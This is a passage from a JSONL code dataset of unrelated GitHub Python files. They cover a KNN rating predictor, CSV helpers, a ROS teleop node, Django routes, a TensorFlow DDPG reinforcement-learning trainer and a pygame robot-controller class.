knn\n\n pred = knn.predict(X_test)\n\n count = 0\n total_error = 0\n for i in range(len(pred)):\n guess = pred[i]\n true = Y_test[i]\n if guess == true:\n count += 1\n\n error_sq = (guess-true)**2\n total_error += error_sq\n\n MSE = float(total_error / len(Y_test))\n\n print(\"\\nThe total number of review we are testing is:\", len(Y_test))\n print(\"The total number of correct predict using current KNN classifier is:\", count)\n print(\"The mean square error is:\", MSE)\n\n return knn\n\n\ndef predict_review(review, knn, dtree):\n \"\"\" This function takes in three arguements:\n 1) review, a string containing the text of a review\n 2) knn, a KNN classifier trained using our training data\n 3) dtree, a Decision tree Classifier trained using our training data\n\n In this function we want to predict star rating of the input review\n using both classifier inputed.\n\n This function does not return anything, but it report the predicted\n star rating using both classifier\n \"\"\"\n features = process_review(review)\n\n v = DictVectorizer(sparse = False)\n test = v.fit_transform(features)\n\n pred_knn = knn.predict(test)\n pred_dtree = dtree.predict(test)\n\n print(\"\\nGiven the review test:\\n\\n\", review)\n print(\"\\nThe star rating/catagory for this review predicted using our trained KNN Classifier is:\", pred_knn[0])\n print(\"\\nThe star rating/catagory for this review predicted using our trained Decision Tree Classifier is:\", pred_dtree[0])\n","repo_name":"ivyliu2019/CS35-Final-Project","sub_path":"Machine 
Learning/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3786727021","text":"# # Order program\r\n\r\nimport sys\r\nimport subprocess\r\n\r\nmsg = sys.argv[1]\r\n\r\nif msg == \"start\":\r\n # recv.pyを起動\r\n print(\"started\")\r\n subprocess.run(['test/bin/python3', 'working/recv.py'])\r\n\r\nelse:\r\n from socket import socket, AF_INET, SOCK_DGRAM\r\n HOST = ''\r\n PORT = 5000\r\n ADDRESS = \"127.0.0.1\"\r\n s = socket(AF_INET, SOCK_DGRAM)\r\n\r\n s.sendto(msg.encode(), (ADDRESS, PORT))\r\n\r\n msg, address = s.recvfrom(8192)\r\n msg = msg.decode()\r\n print(msg)\r\n\r\n s.close()\r\n","repo_name":"hakoshi-normal/gpt_chat_interface","sub_path":"gpt_server/trans.py","file_name":"trans.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71973401041","text":"from __future__ import print_function\n\ndef read_csv_column_major(filename, return_type='dict'):\n with open(filename, 'r') as f:\n first_line = f.readline()\n col_name = first_line.split(',')\n for i in range(0, len(col_name)):\n col_name[i] = col_name[i].strip()\n col_num = len(col_name)\n \n if return_type == 'dict':\n cols = dict()\n for i in range(0, len(col_name)):\n cols[col_name[i]] = list() \n elif return_type == 'list':\n cols = [list() for i in range(0, col_num)]\n\n for line in f:\n entry = line.split(',')\n assert len(entry) == col_num\n if return_type == 'dict':\n for i in range(0, len(entry)):\n cols[col_name[i]].append(entry[i].strip())\n elif return_type == 'list':\n for i in range(0, len(entry)):\n cols[i].append(entry[i].strip())\n\n if return_type == 'dict':\n return cols\n elif return_type == 'list':\n return (col_name, cols)\n else:\n return None\n\ndef write_csv_column_major(col_name, cols, filename):\n with open(filename, 'w') as f:\n # first line\n f.write(col_name[0])\n for i in range(1, len(col_name)):\n f.write(',' + col_name[i])\n f.write('\\n')\n\n first_col = cols[0]\n col_num = len(cols)\n row_num = len(first_col)\n for i in range(0, row_num):\n f.write(first_col[i])\n for j in range(1, col_num):\n f.write(',' + cols[j][i])\n f.write('\\n')\n\ndef read_edges_as_set(filename):\n edges_set = set()\n with open(filename, 'r') as f:\n f.readline()\n for line in f:\n entry = line.strip().split(',')\n assert len(entry) == 2\n v1 = int(entry[0])\n v2 = int(entry[1])\n edges_set.add((min(v1, v2), max(v1, v2)))\n return edges_set\n\ndef write_training_file(training_edges_list, filename):\n with open(filename, 'w') as f:\n print('user1, user2', file=f)\n for e in training_edges_list:\n print(e[0], e[1], sep=',', file=f)\n return \n\ndef write_testing_file(testing_edges_list, test_filename, ans_filename):\n with open(test_filename, 'w') as test_f:\n with open(ans_filename, 'w') as ans_f:\n print('user1, user2', file=test_f)\n for e in testing_edges_list:\n print(e[0][0], e[0][1], sep=',', file=test_f)\n print(e[1], file=ans_f)\n return \n","repo_name":"barry800414/SNA_lecture","sub_path":"networkx/gen_pokec_data/file_io.py","file_name":"file_io.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26878943254","text":"#!/usr/bin/env python\nimport rospy\nfrom std_msgs.msg import String\nimport key_press as kp\n\ndef talker():\n pub = rospy.Publisher('chatter', String, 
queue_size=10)\n rospy.init_node('talker', anonymous=True)\n rate = rospy.Rate(10)\n while not rospy.is_shutdown():\n cmd_str = kp.fetch_command()\n rospy.loginfo(cmd_str)\n pub.publish(cmd_str)\n rate.sleep()\n\n\nif __name__ == '__main__':\n try:\n # initialize Keyboard Interface\n kp.init()\n talker()\n except rospy.ROSInterruptException:\n kp.stop()\n","repo_name":"swagatk/Raspi_codes","sub_path":"ROS/keyboard_teleop/kb_teleop.py","file_name":"kb_teleop.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18849664542","text":"def prime(n):\n if n==1:\n return False\n for i in range(2,int(n**0.5)+1):\n if n%i==0:\n return 0\n return 1\n \nx=int(input())\ny=int(input())\na=0\nwhile x<=y:\n if prime(x):\n a+=1\n x+=1\nprint(a)","repo_name":"Sk1458/codemind-python","sub_path":"Primes_in_range.py","file_name":"Primes_in_range.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12011039034","text":"from django.conf.urls.defaults import patterns, url, include\nfrom django.contrib import admin\nfrom django.views.generic import RedirectView\nfrom wintersession import views, api\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^enroll/$', RedirectView.as_view(url='/register/'), name='enroll'),\n url(r'^student/$', RedirectView.as_view(url='/register/'), name='student'),\n url(r'^courses/$', views.courses, name='courses'),\n url(r'^register/$', views.register, name='register'),\n url(r'^instructor/$', views.instructor, name='instructor'),\n url(r'^instructor/attendance$', views.instructor, name='attendance'),\n url(r'^student/drop/$', views.drop, name='drop'),\n url(r'^student/add/$', views.add, name='add'),\n url(r'^student/agenda/(?P.{1,8})/$', views.agenda, name='agenda'),\n url(r'^student/agenda/$', views.my_agenda, name='agenda'),\n url(r'^student/friend_agenda/$', views.friend_agenda, name='friend_agenda'),\n url(r'^teach/$', views.teach, name='teach'),\n url(r'^about/$', views.about, name='about'),\n url(r'^events/$', views.events, name='events'),\n url(r'^$', views.home, name='home'),\n\n url(r'^admin/$', views.admin, name='admin'),\n url(r'^admin/email$', views.admin_email, name='admin_email'),\n url(r'^admin/reschedule_check', views.admin_reschedule_check, name='admin_reschedule_check'),\n url(r'^admin/reschedule', views.admin_reschedule, name='admin_reschedule'),\n url(r'^admin$', RedirectView.as_view(url='/admin/')),\n (r'^djadmin/', include(admin.site.urls)),\n\n # login/logout\n url(r'^login/?$', 'django_cas.views.login', name='login'),\n url(r'^logout/?$', 'django_cas.views.logout', name='logout'),\n\n url(r'^api/', include(api.router.urls, namespace='api')),\n)\n","repo_name":"cakirmehmete/tigerapps","sub_path":"tigerapps/wintersession/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"41411915725","text":"\"\"\"\nWe have one external module pyinstaller which is used to convert .py to .exe in python programming.\n\nsyntax - pyninstaller pythonfile.py\n\nIt creates .exe file with all dependencies if we wish to get only one file so we can write this command\n\npyinstaller --oneline pythonfile.py \n\"\"\"\n\nfrom win32com.client import Dispatch\n\ndef text_to_speech_func(text):\n speaker = Dispatch(\"SAPI.SpVoice\")\n speaker.speak(text)\n\ntext = 
\"BAAR BAAR DIN AAYE BAAR BAAR DIL YE GAYE TUM JIYO HAZARO SAAL HAI MERI YE ARZOO HAPPY BIRTHDAY TO YOU NITIN HAPPY BIRTHDAY TO YOU NITIN HAPPY BIRTHDAY TO YOUUUUUUUUUUU\"\ntext_to_speech_func(text)","repo_name":"s1911nitin/PythonCourse","sub_path":"59_conversion_.pyto.exe.py","file_name":"59_conversion_.pyto.exe.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1255049657","text":"import tensorflow as tf\r\nfrom tensorflow.train import AdamOptimizer\r\nimport numpy as np\r\nimport random\r\nimport os\r\nfrom ENVS.AbstractEnv import AbsEnv\r\nfrom .model import AbsControlModel, AbsEvaluateModel\r\nfrom TOOLS.Logger import Logger\r\nfrom TOOLS.noises import OrnsteinUhlenbeckActionNoise\r\n\r\n\r\nclass DataBuffer(object):\r\n def __init__(self, obs_dim: int, act_dim: int, size: int):\r\n \"\"\"\r\n 数据缓存器的初始化\r\n\r\n :param obs_dim: int,\r\n 状态观测向量的长度\r\n :param act_dim: int,\r\n 行动向量的长度\r\n :param size: int,\r\n 数据缓存器的总容量\r\n \"\"\"\r\n # 存储当前的状态观测向量\r\n self.obs_t_buffer = np.zeros((size, obs_dim), dtype=np.float32)\r\n # 存储当前的行动向量\r\n self.act_t_buffer = np.zeros((size, act_dim), dtype=np.float32)\r\n # 存储当前的奖励信号值\r\n self.reward_t_buffer = np.zeros((size, ), dtype=np.float32)\r\n # 存储衍生的状态观测向量\r\n self.obs_n_buffer = np.zeros((size, obs_dim), dtype=np.float32)\r\n # 存储衍生的状态是否为终止状态\r\n self.done_n_buffer = np.zeros((size, ), dtype=np.float32)\r\n # 记录总数据条数的计数变量\r\n self.current_index = 0\r\n # 数据缓存器的大小\r\n self.size = size\r\n\r\n def store(self, obs_t: np.ndarray, act_t: np.ndarray, reward_t: float, obs_n: np.ndarray, done_n: bool) -> None:\r\n \"\"\"\r\n 决策器将观测到的一条数据记录写入到数据缓存器当中,这种写入会按照循环次序的方式进行\r\n\r\n :param obs_t: np.ndarray,\r\n 决策器决策时所面临的状态\r\n :param act_t: np.ndarray,\r\n 决策器基于当前所面临的状态所作出的决策--行动向量\r\n :param reward_t: float,\r\n 决策器观测到的环境对象执行动作向量之后所得到的奖励信号数值\r\n :param obs_n: np.ndarray,\r\n 决策器观测到的环境对象执行动作向量之后所得到的衍生状态观测向量\r\n :param done_n:\r\n 决策器观测到的环境对象执行动作向量之后所得到的衍生状态观测是否是终止状态\r\n :return: None\r\n 无返回值\r\n \"\"\"\r\n # 当前插入样本的对应索引\r\n item_current_index = self.current_index % self.size\r\n # 向数据缓存器中插入当前记录\r\n self.obs_t_buffer[item_current_index] = obs_t\r\n self.act_t_buffer[item_current_index] = act_t\r\n self.reward_t_buffer[item_current_index] = reward_t\r\n self.obs_n_buffer[item_current_index] = obs_n\r\n self.done_n_buffer[item_current_index] = done_n\r\n # 总数据计数器加1\r\n self.current_index += 1\r\n\r\n def get(self, sample_size: int) -> tuple:\r\n \"\"\"\r\n 从数据缓存器中抽取出特定数量的样本组\r\n\r\n :param sample_size: int,\r\n 抽取样本组的数量\r\n :return: tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray, np.ndarray],\r\n 返回各个子容器特定索引下的样本组\r\n \"\"\"\r\n sample_index = random.sample(range(min(self.current_index, self.size)), sample_size)\r\n return self.obs_t_buffer[sample_index], self.act_t_buffer[sample_index], self.reward_t_buffer[sample_index], \\\r\n self.obs_n_buffer[sample_index], self.done_n_buffer[sample_index]\r\n\r\n def get_buffer_size(self) -> int:\r\n \"\"\"\r\n 获取当前数据缓存器中的有效样本数量\r\n\r\n :return: int,\r\n 返回当前数据缓存器中的有效样本数量\r\n \"\"\"\r\n return min(self.current_index, self.size)\r\n\r\n\r\nclass DDPG(object):\r\n def __init__(self, env: AbsEnv, policy_model: AbsControlModel, evaluate_model: AbsEvaluateModel, save_dir: str,\r\n exp_name: str, logger: Logger, gamma: float, eva_lr: float, pol_lr: float, rho: float,\r\n conti_act_low: np.ndarray, conti_act_high: np.ndarray, is_OU_noise: bool = False):\r\n \"\"\"\r\n 
深度确定性策略梯度方法(DDPG)是一种适用于连续控制指令场景下的决策机,其特点是策略网络给出的是确定行动,而不是行动概率分布,其缺点\r\n 也是由于这个原因,策略网络本身没有办法进行探索,所以在训练过程中需要在策略网络输出结果上添加噪音。\r\n\r\n :param env: AbsEnv,\r\n 与DDPG决策器进行交互的环境对象,这里使用的环境对象需要满足AbsEnv的接口规范\r\n :param policy_model: AbsControlModel,\r\n 策略网络对象\r\n :param evaluate_model: AbsEvaluateModel,\r\n 估值网络对象\r\n :param save_dir: str,\r\n 策略网络对象和估值网络对象模型参数存储文件地址\r\n :param exp_name: str,\r\n 本次试验的名称\r\n :param logger: Logger,\r\n 日志对象\r\n :param gamma: float,\r\n 远期奖励的折现系数\r\n :param eva_lr: float,\r\n 估值网络的学习速率\r\n :param pol_lr: float,\r\n 策略网络的学习速率\r\n :param rho: float,\r\n 目标网络向主网络靠近的速率\r\n :param conti_act_low: np.ndarray,\r\n 连续运动指令的下限\r\n :param conti_act_high: np.ndarray,\r\n 连续运动指令的上限\r\n :param is_OU_noise: bool,\r\n 控制过程中的随机噪音是否引入OU噪音\r\n \"\"\"\r\n # 与决策器进行交互的环境对象\r\n self.env = env\r\n # 策略网络模型\r\n self.policy_model = policy_model\r\n # 估值网络模型\r\n self.evaluate_model = evaluate_model\r\n # 远期奖励的折现系数\r\n self.gamma = gamma\r\n # 估值网络的学习率\r\n self.evaluate_lr = eva_lr\r\n # 策略网络的学习率\r\n self.policy_lr = pol_lr\r\n # 目标网络向主网络的靠近速率\r\n self.rho = rho\r\n # 日志文件对象\r\n self.logger = logger\r\n # 模型参数存储文件夹\r\n self.target_dir_path = os.path.join(save_dir, exp_name)\r\n if not os.path.exists(self.target_dir_path):\r\n os.mkdir(self.target_dir_path)\r\n # 模型参数存储文件名称\r\n self.target_file_name = os.path.join(self.target_dir_path, 'DDPG_Model.ckpt')\r\n # 连续动作指令的上限和下限\r\n self.conti_act_low = conti_act_low\r\n self.conti_act_high = conti_act_high\r\n # 控制学习过程中是否引入OU噪音\r\n self.is_OU_noise = is_OU_noise\r\n\r\n self.ph_reward, self.ph_done, self.ph_obs_new, self.ph_obs, self.ph_act, self.policy, self.target_policy,\\\r\n self.evaluate_act, self.evaluate_policy, self.target_evaluate_policy, self.evaluate_loss, self.train_evaluate, \\\r\n self.policy_loss, self.train_policy, self.update_target_params, self.init_target_params = self.build_model()\r\n\r\n def build_model(self) -> list:\r\n \"\"\"\r\n 定义一个TensorFlow计算图\r\n\r\n :return: tuple,\r\n 返回一组用于DDPG更新的占位符和计算节点\r\n \"\"\"\r\n # ++++++++++++++++++ 占位符 ++++++++++++++++\r\n ph_reward = tf.placeholder(dtype=tf.float32, shape=(None, ), name='Reward_PH')\r\n ph_done = tf.placeholder(dtype=tf.float32, shape=(None, ), name='Done_PH')\r\n ph_obs_new = tf.placeholder(dtype=tf.float32, shape=(None, self.env.obs_dim), name='Obs_New_PH')\r\n ph_obs = tf.placeholder(dtype=tf.float32, shape=(None, self.env.obs_dim), name='Obs_PH')\r\n ph_act = tf.placeholder(dtype=tf.float32, shape=(None, self.env.act_dim), name='Act_PH')\r\n # ++++++++++++++++++ 占位符 ++++++++++++++++\r\n # +++++++++++++++++ 模型定义 ++++++++++++++++\r\n main_policy_name = 'MainPolicy'\r\n main_evaluate_name = 'MainEvaluate'\r\n target_policy_name = 'TargetPolicy'\r\n target_evaluate_name = 'TargetEvaluate'\r\n with tf.variable_scope(main_policy_name):\r\n policy = self.policy_model.build_model(ph_obs, self.conti_act_high)\r\n with tf.variable_scope(target_policy_name):\r\n target_policy = self.policy_model.build_model(ph_obs_new, self.conti_act_high)\r\n with tf.variable_scope(main_evaluate_name):\r\n evaluate_act, evaluate_policy = self.evaluate_model.build_model(ph_obs, ph_act, policy)\r\n with tf.variable_scope(target_evaluate_name):\r\n _, target_evaluate_policy = self.evaluate_model.build_model(ph_obs_new, ph_act, target_policy)\r\n # 主策略网络的全体参数\r\n policy_params = [i for i in tf.global_variables() if main_policy_name in i.name]\r\n evaluate_params = [i for i in tf.global_variables() if main_evaluate_name in i.name]\r\n target_policy_params = [i for i in tf.global_variables() if 
target_policy_name in i.name]\r\n target_evaluate_params = [i for i in tf.global_variables() if target_evaluate_name in i.name]\r\n # +++++++++++++++++ 模型定义 ++++++++++++++++\r\n # +++++++++++++++++ 算法 ++++++++++++++++\r\n # 混合了真实奖励信号的部分准确回报\r\n real_repay = ph_reward + self.gamma * (1 - ph_done) * target_evaluate_policy\r\n # 梯度下降在这一个分项上需要进行截断\r\n real_repay = tf.stop_gradient(real_repay)\r\n # 估值网络损失函数\r\n evaluate_loss = tf.reduce_mean(tf.square(evaluate_act - real_repay))\r\n train_evaluate = AdamOptimizer(learning_rate=self.evaluate_lr).minimize(evaluate_loss, var_list=evaluate_params)\r\n # 策略网络损失函数\r\n policy_loss = - tf.reduce_mean(evaluate_policy)\r\n train_policy = AdamOptimizer(learning_rate=self.policy_lr).minimize(policy_loss, var_list=policy_params)\r\n # 更新目标网络参数\r\n update_target_policy_params = tf.group([tf.assign(param_targ, self.rho * param_main + (1-self.rho) * param_targ)\r\n for param_main, param_targ in zip(policy_params, target_policy_params)])\r\n update_target_evaluate_params = tf.group([tf.assign(param_targ, self.rho * param_main + (1-self.rho) * param_targ)\r\n for param_main, param_targ in zip(evaluate_params,\r\n target_evaluate_params)])\r\n update_target_params = tf.group([update_target_policy_params, update_target_evaluate_params])\r\n # 初始化目标网络的参数等于主网络的参数\r\n init_target_policy_params = tf.group([tf.assign(param_targ, param_main)\r\n for param_main, param_targ in zip(policy_params, target_policy_params)])\r\n init_target_evaluate_params = tf.group([tf.assign(param_targ, param_main)\r\n for param_main, param_targ in zip(evaluate_params,\r\n target_evaluate_params)])\r\n init_target_params = tf.group([init_target_policy_params, init_target_evaluate_params])\r\n # +++++++++++++++++ 算法 ++++++++++++++++\r\n return [ph_reward, ph_done, ph_obs_new, ph_obs, ph_act, policy, target_policy, evaluate_act,\r\n evaluate_policy, target_evaluate_policy, evaluate_loss, train_evaluate, policy_loss,\r\n train_policy, update_target_params, init_target_params]\r\n\r\n def train(self, buffer_size: int = 1000000, retrain_label: bool = False, learn_epochs: int = 150,\r\n max_iter_per_epoch: int = 4000, sample_size: int = 200, save_freq: int = 10, noise_scale: float = 0.1,\r\n start_steps: int = 10000, update_after: int = 1000, update_every: int = 50, render: bool = False):\r\n # 创建计算资源会话\r\n sess = tf.Session()\r\n # 创建模型存储对象\r\n model_saver = tf.train.Saver(max_to_keep=5)\r\n # 创建数据缓存器\r\n data_buffer = DataBuffer(self.env.obs_dim, self.env.act_dim, buffer_size)\r\n # 如果是重新进行训练的话,就读取历史参数记录\r\n if retrain_label:\r\n model_saver.restore(sess, tf.train.latest_checkpoint(self.target_dir_path))\r\n # 否则的话,就初始化计算资源会话中的各个变量\r\n else:\r\n sess.run(tf.global_variables_initializer())\r\n # 同时将目标网络的参数初始化为主网络中的参数\r\n _ = sess.run(self.init_target_params)\r\n # 开始进行测试和训练\r\n def get_action(obs_t, noise_scale):\r\n act = sess.run(self.policy, feed_dict={self.ph_obs: obs_t.reshape(1, -1)})\r\n # 目前只有一个状态观测向量,所以只衍生出一个行动向量\r\n act = act[0]\r\n # 在行动向量上添加随机噪音\r\n if not self.is_OU_noise:\r\n act += noise_scale * np.random.randn(self.env.act_dim)\r\n else:\r\n act += OU_noise()\r\n return np.clip(act, self.conti_act_low, self.conti_act_high)\r\n # 总决策次数等于单回合最大决策次数乘以学习回合总数\r\n total_steps = max_iter_per_epoch * learn_epochs\r\n obs_t, ep_repay, ep_len = self.env.reset(), 0, 0\r\n if self.is_OU_noise:\r\n OU_noise = OrnsteinUhlenbeckActionNoise(np.zeros(self.env.act_dim, ), sigma=0.75)\r\n k = 1\r\n for t in range(total_steps):\r\n if render:\r\n try:\r\n self.env.render()\r\n except Exception as 
e:\r\n pass\r\n\r\n if t > start_steps:\r\n act = get_action(obs_t, noise_scale)\r\n else:\r\n if not self.is_OU_noise:\r\n act = self.conti_act_high * (np.random.rand(self.env.act_dim) * 2 - 1)\r\n else:\r\n act = OU_noise()\r\n reward, obs_n, done, _ = self.env.step(act)\r\n ep_repay += reward\r\n ep_len += 1\r\n done = False if ep_len == max_iter_per_epoch else done\r\n data_buffer.store(obs_t, act, reward, obs_n, done)\r\n obs_t = obs_n\r\n\r\n if done or (ep_len == max_iter_per_epoch):\r\n self.logger.to_log('[%d]控制回合结束!总得分为:%.2f' % (k, ep_repay))\r\n obs_t, ep_repay, ep_len = self.env.reset(), 0, 0\r\n k += 1\r\n # OU噪音重置为初始状态\r\n OU_noise.reset()\r\n\r\n if t >= update_after and t % update_every == 0:\r\n evaluate_loss_list = []\r\n policy_loss_list = []\r\n for _ in range(update_every):\r\n obs_t_buf, act_t_buf, rew_t_buf, obs_n_buf, done_buf = data_buffer.get(sample_size)\r\n feed_dict = {self.ph_obs: obs_t_buf, self.ph_act: act_t_buf, self.ph_reward: rew_t_buf,\r\n self.ph_obs_new: obs_n_buf, self.ph_done: done_buf}\r\n evaluate_outs = sess.run([self.evaluate_loss, self.train_evaluate], feed_dict=feed_dict)\r\n policy_outs = sess.run([self.policy_loss, self.train_policy], feed_dict=feed_dict)\r\n if np.random.rand() < 0.3:\r\n sess.run(self.update_target_params)\r\n evaluate_loss_list.append(evaluate_outs[0])\r\n policy_loss_list.append(policy_outs[0])\r\n mean_evaluate_loss = np.mean(evaluate_loss_list)\r\n mean_policy_loss = np.mean(policy_loss_list)\r\n if t % 4000 == 0:\r\n self.logger.to_log('估值网络上的损失为:%.6f' % mean_evaluate_loss)\r\n self.logger.to_log('策略网络上的得分为:%.6f' % (-mean_policy_loss))\r\n if t % save_freq == 0:\r\n model_saver.save(sess, self.target_file_name, global_step=t)\r\n\r\n # 关闭计算资源\r\n sess.close()\r\n\r\n def test(self, test_epochs, max_iter_per_epoch):\r\n import time\r\n # 创建计算资源会话\r\n sess = tf.Session()\r\n # 创建模型存储对象\r\n model_saver = tf.train.Saver()\r\n # 向计算资源会话中恢复模型参数\r\n model_saver.restore(sess, tf.train.latest_checkpoint(self.target_dir_path))\r\n\r\n for epoch in range(test_epochs):\r\n self.logger.to_log('+++++++ Excuting - [%d] +++++++' % epoch)\r\n obs_t = self.env.reset()\r\n ep_repay = 0\r\n for k in range(max_iter_per_epoch):\r\n try:\r\n self.env.render()\r\n time.sleep(0.02)\r\n except Exception:\r\n pass\r\n\r\n act_t = sess.run(self.policy, feed_dict={self.ph_obs: obs_t.reshape(1, -1)})\r\n reward_t, obs_t, done, _ = self.env.step(act_t[0])\r\n ep_repay += reward_t\r\n if done or k == max_iter_per_epoch - 1:\r\n self.logger.to_log('控制回合结束,总得分为:%.2f' % ep_repay)\r\n ep_repay = 0\r\n break\r\n\r\n","repo_name":"xiaojianyang820/StandardRL","sub_path":"DDPG/algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":17408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23581772589","text":"N = int(input())\n\nfor _ in range(N):\n ps = list(input())\n stack = []\n empty_stack = False\n \n for i in range(len(ps)):\n if ps[i] == \"(\":\n stack.append(ps[i])\n else:\n if not stack:\n empty_stack = True\n break\n else:\n stack.pop()\n \n if not stack and not empty_stack:\n print(\"YES\")\n else:\n print(\"NO\")","repo_name":"Otwooo/Study_Algorithm","sub_path":"baekjoon/자료 구조/[9012]괄호.py","file_name":"[9012]괄호.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26413616368","text":"def fac(n):\n product = 1\n for i in range(n):\n product = product * (i+1)\n return 
product\n\nprint(fac(5))\n\nprint(fac(4))\n\na = fac(3)\nprint(a)\n\n\n\n\ndef factRec(n):\n if n==1 or n==0:\n return 1\n return n * factRec(n-1)\n\n\nf = factRec(4)\nprint(f)","repo_name":"mdahtisham/Python","sub_path":"Chapter 8/chap8pro5.py","file_name":"chap8pro5.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34361038534","text":"class Solution:\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n A,B = nums1, nums2\n total = len(nums1) + len(nums2)\n half = total // 2\n\n #ensure that A is always the minimum array\n if len(B) < len(A):\n A,B = B,A\n\n l,r = 0, len(A) - 1\n while True:\n i = (l + r) // 2 #index for A\n j = half - i - 2 #j is the index for B. -2 to account for 0 index\n\n Aleft = A[i] if i >= 0 else float(\"-infinity\")\n Aright = A[i + 1] if (i + 1) < len(A) else float(\"infinity\")\n Bleft = B[j] if j >= 0 else float(\"-infinity\")\n Bright = B[j + 1] if (j + 1) < len(B) else float (\"infinity\")\n\n #partition is correct\n if Aleft <= Bright and Bleft <= Aright:\n #odd\n if total % 2 != 0:\n return min(Aright, Bright)\n else:\n return (max(Aleft, Bleft) + min(Aright, Bright)) / 2\n elif Aleft > Bright:\n r = i - 1\n else:\n l = i + 1\n ","repo_name":"Devica2000/leetcode-submissions","sub_path":"0004-median-of-two-sorted-arrays/0004-median-of-two-sorted-arrays.py","file_name":"0004-median-of-two-sorted-arrays.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15317360913","text":"from __future__ import absolute_import\n\n__docformat__ = \"restructuredtext en\"\n\nimport os\nimport sys\nimport time\nimport logging\nimport pygame\nimport six\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(\n os.path.abspath(__file__))))\nsys.path.append(BASE_DIR)\n\nfrom tborg import(\n create_working_dir, ConfigLogger, ThunderBorg, ThunderBorgException)\nfrom tborg.utils.daemon import Daemon\n\ncreate_working_dir()\n\nfrom tborg import BORG_CUBE, LOG_PATH, RUN_PATH\n\n\nclass PYGameController(object):\n \"\"\"\n Initializes the attached controller.\n \"\"\"\n _DEFAULT_CTRL_WAIT = 0.1\n _DEFAULT_EVENT_WAIT = 0.0\n\n def __init__(self, logger_name='', log_level=logging.INFO, debug=False):\n \"\"\"\n Initialize logging and sets the two wait times to a reasonable\n default.\n \"\"\"\n self._debug = debug\n self._clog = logging.getLogger(logger_name)\n self._clog.setLevel(log_level)\n self.__controller_initialized = False\n self.__ctrl_wait_time = 0\n self.ctrl_wait_time = self._DEFAULT_CTRL_WAIT\n self.event_wait_time = self._DEFAULT_EVENT_WAIT\n self._quit = False\n\n @property\n def ctrl_wait_time(self):\n \"\"\"\n Property that gets or sets the controller wait time. This wait\n time is used when looping during the controller detection period.\n\n :param sleep: The period of time to sleep between checks. Defaults\n to 0.1 seconds.\n :type sleep: float\n \"\"\"\n return self.__ctrl_wait_time\n\n @ctrl_wait_time.setter\n def ctrl_wait_time(self, sleep):\n self.__ctrl_wait_time = sleep\n\n @property\n def event_wait_time(self):\n \"\"\"\n Property that gets or sets the event wait time. This wait time is\n used when looping during the event processing period.\n\n :param sleep: The period of time to sleep between event\n processing. 
Defaults to 0.0 seconds.\n :type sleep: float\n \"\"\"\n return self.__event_wait_time\n\n @event_wait_time.setter\n def event_wait_time(self, sleep):\n self.__event_wait_time = sleep\n\n @property\n def is_ctrl_init(self):\n \"\"\"\n A property that returns `True` or `False` if the controller is\n initialized.\n \"\"\"\n return self.__controller_initialized\n\n def init_controller(self):\n \"\"\"\n Wait until the controller is connected then initialize pygame.\n \"\"\"\n pygame.init()\n\n while True:\n try:\n pygame.joystick.init()\n except pygame.error as e:\n self._clog.error(\"PYGame error: %s\", e)\n if self._quit_sleep(): break\n except KeyboardInterrupt:\n self._clog.warn(\"User aborted with CTRL C.\")\n break\n else:\n if pygame.joystick.get_count() < 1:\n if self._quit_sleep(): break\n else:\n self.joystick = pygame.joystick.Joystick(0)\n self.joystick.init()\n self._initialize_variables()\n self._clog.info(\"Found controller.\")\n self.__controller_initialized = True\n break\n\n def _quit_sleep(self):\n error = False\n\n try:\n pygame.joystick.quit()\n time.sleep(self.ctrl_wait_time)\n except KeyboardInterrupt:\n self._clog.warn(\"User aborted with CTRL C.\")\n error = True\n\n return error\n\n def _initialize_variables(self):\n self.axis_data = {\n axis: 0.0 for axis in range(self.joystick.get_numaxes())\n }\n self.ball_data = {\n ball: 0.0 for ball in range(self.joystick.get_numballs())\n }\n self.button_data = {\n but: False for but in range(self.joystick.get_numbuttons())\n }\n self.hat_data = {\n hat: (0, 0) for hat in range(self.joystick.get_numhats())\n }\n # Buttons Event Types\n self.SQUARE = 0\n self.CROSS = 1\n self.CIRCLE = 2\n self.TRIANGLE = 3\n self.L1 = 4\n self.R1 = 5\n self.L2 = 6\n self.R2 = 7\n self.SHARE = 8\n self.OPTIONS = 9\n self.LJB = 10\n self.RJB = 11\n self.PSB = 12\n self.PADB = 13\n\n # Axis Event Types\n self.LF_LR = 0\n self.LF_UD = 1\n self.L2_VR = 2\n self.RT_LR = 3\n self.RT_UD = 4 # if self.is_ps4() else 3\n self.R2_VR = 5\n\n # Create HAT variables. Hat Event Types (HAT0, HAT1, ...)\n for i in range(len(self.hat_data)):\n setattr(self, 'HAT' + i, i)\n\n def __set_axis(self, event):\n self.axis_data[event.axis] = round(event.value, 3)\n\n def __set_ball(self, event):\n self.ball_data[event.ball] = event.rel\n\n def __set_button_down(self, event):\n self.button_data[event.button] = True\n\n def __set_button_up(self, 